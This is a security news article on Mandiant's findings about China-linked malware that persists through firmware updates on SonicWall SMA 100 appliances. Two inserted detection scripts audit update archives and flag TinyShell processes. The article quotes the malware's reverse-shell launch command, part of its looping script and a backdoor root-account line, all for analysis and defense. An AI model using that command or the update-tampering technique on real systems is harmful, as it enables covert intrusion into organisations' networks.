Update-resistant malware infects SonicWall security appliances

by Paul Anderson, March 12, 2023, in Malware

Researchers have discovered that threat actors linked to the Chinese government are infecting SonicWall’s Secure Mobile Access 100, a popular security appliance, with malware that remains active even after firmware updates.

The Secure Mobile Access 100 is a highly sought-after device for businesses looking to deploy remote workforces. It provides granular access controls to remote users, VPN connections to organizational networks, and the ability to set unique profiles for each employee. Because of the access it provides to customer networks, the SMA 100 is an attractive target for hackers.

Last year, the SMA 100 was targeted by highly skilled hackers who took advantage of a zero-day vulnerability. Unfortunately, this is not the first time security appliances have been compromised in recent years, with Fortinet and Pulse Secure also falling victim to similar attacks.

Malware gaining persistence

A new report published on Thursday by cybersecurity firm Mandiant has revealed that threat actors, believed to have links to China, are currently executing a targeted campaign to establish long-term persistence by deploying malware on unpatched SonicWall SMA appliances. The campaign has caught the attention of security experts due to the malware’s ability to remain active on the devices even after the firmware has been updated.

“The attackers put significant effort into the stability and persistence of their tooling,” Mandiant researchers wrote. “This allows their access to the network to persist through firmware updates and maintain a foothold on the network through the SonicWall Device.”

To keep its hold on a compromised device, the malware uses a simple but effective tactic. It constantly watches for new firmware updates, checking every 10 seconds. When an update is detected, the malware springs into action: it makes a backup copy of the update archive, extracts its contents, and copies its own malicious files into the extracted tree. It also adds a backdoor root user to the system to ensure future access. Finally, the malware re-archives the package, so the tampered image is what gets installed.
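The tampering described above leaves two traces in the repacked update: files that are not in the vendor's release and an extra uid-0 account in the image's passwd file. The following script, an added example that is not SonicWall's or Mandiant's code, audits an update archive against a known-good manifest and reports both. The archive layout, file contents and manifest are constructed for illustration; the injected file names httpsd and firewalld are the ones the article reports, and the account name backdoor is a placeholder.

```python
"""Audit a firmware update archive for injected files and extra root users.
Added example, not the vendor's or Mandiant's code. The manifest, archive
contents and account names below are constructed for illustration."""
import hashlib
import io
import tarfile


def _sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Constructed known-good release. In practice the manifest comes from the
# vendor's signed release, never from the device being checked.
GOOD_PASSWD = b"root:x:0:0:root:/root:/bin/sh\nadmin:x:1000:1000::/home/admin:/bin/sh\n"
GOOD_FILES = {
    "etc/passwd": GOOD_PASSWD,
    "bin/sshd": b"\x7fELF-legit-daemon",   # placeholder for a real binary
}
KNOWN_GOOD_MANIFEST = {path: _sha256(data) for path, data in GOOD_FILES.items()}


def build_archive(files: dict) -> bytes:
    """Build an in-memory tar.gz so the example runs offline."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for path, data in files.items():
            info = tarfile.TarInfo(name=path)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def extra_root_users(passwd: bytes) -> list:
    """Return account names with uid 0 other than root."""
    found = []
    for line in passwd.decode(errors="replace").splitlines():
        fields = line.split(":")
        if len(fields) >= 3 and fields[2] == "0" and fields[0] != "root":
            found.append(fields[0])
    return found


def audit_update(archive: bytes, manifest: dict) -> dict:
    """Compare an update archive against the known-good manifest.

    Returns the files added, removed or modified relative to the manifest,
    plus any extra uid-0 accounts found in etc/passwd inside the archive.
    """
    seen = {}
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r:gz") as tar:
        for member in tar.getmembers():
            if member.isfile():
                seen[member.name] = tar.extractfile(member).read()
    added = sorted(set(seen) - set(manifest))
    removed = sorted(set(manifest) - set(seen))
    modified = sorted(p for p in seen if p in manifest and _sha256(seen[p]) != manifest[p])
    rogue = extra_root_users(seen.get("etc/passwd", b""))
    return {"added": added, "removed": removed, "modified": modified,
            "extra_root_users": rogue}


def is_clean(report: dict) -> bool:
    """True when nothing differs from the manifest and no extra root user exists."""
    return not any(report.values())


# Constructed tampered archive: the malware's files copied in and a second
# uid-0 account appended to passwd before the archive was repacked.
TAMPERED_FILES = dict(GOOD_FILES)
TAMPERED_FILES["etc/passwd"] = GOOD_PASSWD + b"backdoor:x:0:0::/root:/bin/sh\n"
TAMPERED_FILES["bin/httpsd"] = b"\x7fELF-injected"      # placeholder content
TAMPERED_FILES["bin/firewalld"] = b"#!/bin/sh\n"        # placeholder content

if __name__ == "__main__":
    print(audit_update(build_archive(GOOD_FILES), KNOWN_GOOD_MANIFEST))
    print(audit_update(build_archive(TAMPERED_FILES), KNOWN_GOOD_MANIFEST))
```

The check is only as good as the manifest's provenance: a manifest generated from the appliance itself after compromise would simply bless the injected files, so it has to be taken from the vendor's release on a trusted host.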

“The technique is not especially sophisticated, but it does show considerable effort on the part of the attacker to understand the appliance update cycle, then develop and test a method for persistence,” the researchers added.

An attack campaign in 2021 utilized 16 malware families to infiltrate Pulse Secure devices. This campaign displayed persistence techniques, indicating a sophisticated and well-planned operation. Mandiant has attributed these attacks to several threat groups, including UNC2630 and UNC2717. These groups are aligned with “key Chinese government priorities,” but it’s unclear whether the Chinese government is directly involved in the attacks.

Mandiant is now tracking those responsible for the ongoing attacks against SonicWall SMA 100 customers as UNC4540.

“In recent years Chinese attackers have deployed multiple zero-day exploits and malware for a variety of Internet-facing network appliances as a route to full enterprise intrusion, and the instance reported here is part of a recent pattern that Mandiant expects to continue in the near term,” the researchers added in Thursday’s report.

Gaining privileges

The malware’s primary objective appears to be stealing the cryptographically hashed passwords of all currently logged-in users. In addition, it provides the threat actor with a web shell, which they can use to install fresh malware on the infected device.

“Analysis of a compromised device revealed a collection of files that give the attacker a highly privileged and available access to the appliance,” the researchers wrote in Thursday’s report. “The malware consists of a series of bash scripts and a single ELF binary identified as a TinyShell variant. The overall behavior of the suite of malicious bash scripts shows a detailed understanding of the appliance and is well-tailored to the system to provide stability and persistence.”

The main malware entry point is a bash script named firewalld. Its primary loop is nested over two recursive directory listings, …for j in $(ls / -R) do for i in $(ls / -R) do:…, so the loop body runs once for every pair of files on the system, that is, a number of times equal to the square of the file count. The script executes an SQL command to steal credentials and launches the other components.

The first function in firewalld launches the TinyShell backdoor httpsd with the command nohup /bin/httpsd -c -d 5 -m -1 -p 51432 > /dev/null 2>&1 & if an httpsd process isn’t already running. This puts TinyShell in reverse-shell mode, instructing it to call out to the attacker’s IP address and port at a specific time and day represented by the -m flag, with a beacon interval defined by the -d flag. The binary embeds a hard-coded IP address, which is used in reverse-shell mode if the IP address argument is left blank. It also has a listening bind-shell mode available.
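The invocation quoted above gives a defender concrete process-level indicators: a binary named httpsd, the reverse-shell flag set -c/-d/-m/-p, port 51432, and a shell script named firewalld. The following script, an added example rather than Mandiant's or SonicWall's tooling, parses a ps-style listing and flags processes matching those indicators. The listing is constructed, and the placement of the firewalld script under /bin is assumed for the sample only; the article does not give its path.

```python
"""Flag processes matching the TinyShell indicators named in the article.
Added detection example, not Mandiant's or SonicWall's tooling. The process
listing below is constructed; /bin/firewalld is an assumed location."""
import os
import shlex

# Indicators taken from the article's description of the malware.
SUSPECT_BINARY = "httpsd"
SUSPECT_PORT = "51432"
REVERSE_SHELL_FLAGS = {"-c", "-d", "-m", "-p"}
SUSPECT_SCRIPT = "firewalld"
SHELLS = {"sh", "bash", "dash"}

# Constructed 'ps -eo pid,user,args' style snapshot of a hypothetical appliance.
PS_SNAPSHOT = """\
  PID USER     COMMAND
    1 root     /sbin/init
  412 root     /usr/sbin/sshd -D
  733 root     /bin/httpsd -c -d 5 -m -1 -p 51432
  801 nobody   /usr/sbin/httpd -k start
  950 root     /bin/sh /bin/firewalld
"""


def parse_ps(snapshot: str) -> list:
    """Turn a 'PID USER COMMAND' listing into (pid, user, argv) tuples."""
    rows = []
    for line in snapshot.splitlines()[1:]:      # skip the header row
        parts = line.split(None, 2)
        if len(parts) < 3:
            continue
        pid, user, cmd = parts
        try:
            argv = shlex.split(cmd)
        except ValueError:                       # unbalanced quotes in args
            argv = cmd.split()
        rows.append((int(pid), user, argv))
    return rows


def port_arg(argv: list):
    """Return the value following -p, or None if absent."""
    for i, arg in enumerate(argv[:-1]):
        if arg == "-p":
            return argv[i + 1]
    return None


def find_tinyshell(snapshot: str) -> list:
    """Return (pid, reason) pairs for processes matching the indicators."""
    hits = []
    for pid, _user, argv in parse_ps(snapshot):
        if not argv:
            continue
        name = os.path.basename(argv[0])
        flags = {a for a in argv[1:] if a.startswith("-")}
        if name == SUSPECT_BINARY:
            hits.append((pid, "binary named httpsd (TinyShell variant name from the report)"))
        if REVERSE_SHELL_FLAGS <= flags:
            hits.append((pid, "reverse-shell flag set -c/-d/-m/-p present"))
        if port_arg(argv) == SUSPECT_PORT:
            hits.append((pid, "uses port 51432 named in the report"))
        if name in SHELLS and any(os.path.basename(a) == SUSPECT_SCRIPT for a in argv[1:]):
            hits.append((pid, "shell running a script named firewalld (malware entry point)"))
    return hits


if __name__ == "__main__":
    for pid, reason in find_tinyshell(PS_SNAPSHOT):
        print(f"pid {pid}: {reason}")
```

Each indicator is reported separately so a single weak match (a port number reused by something benign, for instance) can be weighed against the others; the httpsd process in the sample trips three rules at once, which is the combination worth escalating.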

According to researchers, the source of the initial infection remains a mystery. SonicWall issued a notice last week recommending that SMA 100 users upgrade to version 10.2.1.7 or newer.

These updated versions offer valuable features, such as File Integrity Monitoring and anomalous process identification, which could help detect and prevent further breaches.

The patch is available for download on SonicWall’s website. Additionally, users are advised to monitor system logs frequently for any signs of abnormal activity, such as unusual login attempts or unexpected internal network traffic. By staying vigilant, users can take proactive steps to protect their systems and data from potential cyber-attacks.

Tags: Persistence, SonicWall